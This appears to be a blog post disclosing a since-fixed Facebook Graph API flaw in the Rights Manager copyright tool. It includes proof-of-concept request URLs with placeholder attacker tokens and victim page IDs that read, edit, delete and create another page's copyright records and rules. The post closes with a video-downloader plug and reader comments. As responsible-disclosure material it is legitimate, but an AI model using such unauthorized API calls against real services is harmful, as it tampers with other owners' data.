Freebooting is a sort of piracy, most commonly referred as downloading someone else’s copyrighted material and uploading it to any other internet platform, often videos from Youtube to Facebook. A security vulnerability in Facebook’s newly introduced platform called [Copy] Rights Manager (to prevent Freebooting) allows one to hack Facebook brand page copyright data easily.
So what’s the hack?
Technical Details
Rights Manager tool is preapproved for few official pages and any one can request for approval.
Since it is an app owned by Facebook, its access token allows us to read or manipulate data for any Brand page due to insufficient permission checks.
Proof of Concept :-
https://graph.facebook.com/v2.6/<copyright_id_copied_from_victim_query>?method=post&monitoring_type=VIDEO_AND_AUDIO&access_token=<attacker_access_token>&whitelisted_ids
=<attacker_ids_to_bypass_copyright_check>&rule_id=<any_rule_id_if_you_wish_optional_field>&ownership_countries=<can_update_countries_as_well_but_optional>
All the above fields added in the parameters can be updated.
Reading Victim’s Copyrights
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyrights?access_token=<attacker_access_token>
Deleting Victim’s Copyrights
https://graph.facebook.com/v2.6/<victim_page_copyright_id>?method=delete&access_token=<attacker_access_token>
Create copyright rule on behalf of victim’s page
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>&name=testrule&condition_groups=[{action:”ALLOW”,conditions:[{type:”MONITORING_TYPE”,operator:”IS”,value:”VIDEO_ONLY”}]}]
Read Victim’s Copyright Rules
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>
Delete Copyright Rule
https://graph.facebook.com/v2.6/<victim_page_copyright_rule_id>?method=delete&access_token=<attacker_access_token>
Facebook Acknowledgement of Fix and Bounty of $4000 USD
Feel free to use our free Facebook video downloader online tool to download Facebook videos but beware of copyrights 😉
Good Laxman..keep on researching and help facebook get more secure…
Nice Find !